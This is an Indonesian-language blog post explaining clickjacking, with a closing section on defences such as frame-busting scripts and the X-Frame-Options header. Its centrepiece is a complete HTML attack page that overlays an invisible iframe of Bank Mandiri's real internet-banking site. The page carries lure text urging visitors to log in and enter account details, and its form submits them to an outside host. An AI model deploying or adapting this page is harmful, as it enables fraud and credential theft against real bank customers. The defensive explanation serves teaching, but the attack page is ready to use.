Clickjacking pertama kali di perkenalkan oleh Jeremiah Grossman dan Robert Hansen pada tahun 2008.
Clickjacking adalah salah satu contoh trick pengambilan data,dengan modus penipuan.
Trick ini berpotensi mengirim perintah yang tidak sah atau mengungkapkan informasi rahasia sementara korban berinteraksi pada halaman web yang tampaknya tidak berbahaya.
Untuk lebih jelas nya..Perhatikan gambar di bawah
Setelah korban berselancar di halaman web fiktif , ia berpikir bahwa ia berinteraksi dengan user interface terlihat, tetapi efektif ia melakukan tindakan pada halaman tersembunyi . Karena halaman tersembunyi adalah halaman otentik , penyerang dapat menipu pengguna agar melakukan tindakan yang mereka tidak pernah dimaksudkan untuk melakukan melalui " ad hoc " posisi elemen dalam halaman web .
Kekuatan dari metode ini adalah karena fakta bahwa tindakan yang dilakukan oleh korban berasal dari halaman web target yang otentik ( tersembunyi tapi otentik ) . Akibatnya beberapa perlindungan anti - CSRF , yang digunakan oleh para pengembang untuk melindungi halaman web dari serangan CSRF , bisa dilewati
Bagaimana cara kerja Clickjacking tersebut?
Untuk melaksanakan jenis teknik ini penyerang harus membuat sebuah halaman web yang tampaknya tidak berbahaya contoh situs Clound.COM dan menyisipkan halaman yang akan diserangnya contoh: TARGET.COM
Setelah itu, penyerang mengajak korban untuk mengunjungi situs Clound.COM untuk memaksa korban melakukan "klik" pada situsnya dan tanpa sadar melakukan "klik" di situs Clound.COM maka si korban sudah melakukan klik-an pada situs TARGET.COM
Sample Clickjacking in Mandiri Ibank
Dalam serangan ini kita dapat mencoba apakah sebuah situs dapat dieksploitasi Clickjacking menggunakan HTML tags <iframe>kita bisa membuat code dengan codingan html di bawah ini
<html>
<title>
Clickjacking
</title>
<style type="text/css">
<!--
body {background: #D7E7F5 no-repeat fixed center;}
-->
</style>
<center>
<h4> DUNIA IMAJINASI<br>
Untuk Melanjutkan layanan kami, anda perlu persetujan account bank anda<br>
1.Pastikan anda login dengan Account Mandiri IBank<br>
2.CLICK DOWNLOAD<br>
ANDA AKAN MENDAPAT File YANG ADA INGINKAN<br>
</h4>
</h2>
CATATAN: KOLOM SUDAH DIPRIVACY HARAP PASTEKAN DENGAN HATI-HATI !
</h2>
</center>
<form action="http://devilzc0de.org/">
<input align="left" style="position:absolute;top:230px;left:660px" name="Rekening" value=""><br>
<input style="position:absolute;top:275px;left:660px" name="Rekening" value=""><br>
<button style="position:absolute;top:320px;left:700px">Download</button>
</form>
<iframe src="https://ib.bankmandiri.co.id/" style="position:absolute;width:800px;height:500px;top:90px;left:270px;opacity:0.5" scrolling="no" frameborder="none">
</iframe>
</html>
Pada nilai opacity saya mengganti nilai jadi 0.5 agar lebih mudah mengatur letak tombol.
Ubah nilai opacity menjadi 0 agar frame dari situs target tidak kelihatan.
Well,itu adalah contoh demo dari Clickjacking
Kelebihan Clickjacking
-Walaupun situs tersebut menggunakan SSL,Clickjacking tidak terpengaruh dengan hal itu.
-Tidak terpengaruh dengan CSRFtoken.
Cara menangani Clickjacking
Server Side Protection
#Frame Busting / Framekiller
yaitu dengan menyisipkan code javascript untuk melindungi halaman dari <iframe> tags melalui situs lain/browser.
<style> html{display:none;} </style>
<script>
if(self == top) {
document.documentElement.style.display = 'block';
} else {
top.location = self.location;
}
</script>
Server & Client Side Protection
#X-Frame-Options
X-Frame-Options adalah http header yang belum lama direlease oleh Internet Engineering Task Force (IETF) untuk melindungi server dari Clickjacking.
Ada 3 nilai valuenya
-Deny = tidak memperbolehkan
-Sameorigin = hanya situs itu sendiri
-Allow-from = diperbolehkan dari beberapa situs yang telah diijinkan oleh server.
0 Response to "Clickjacking Attack"
Post a Comment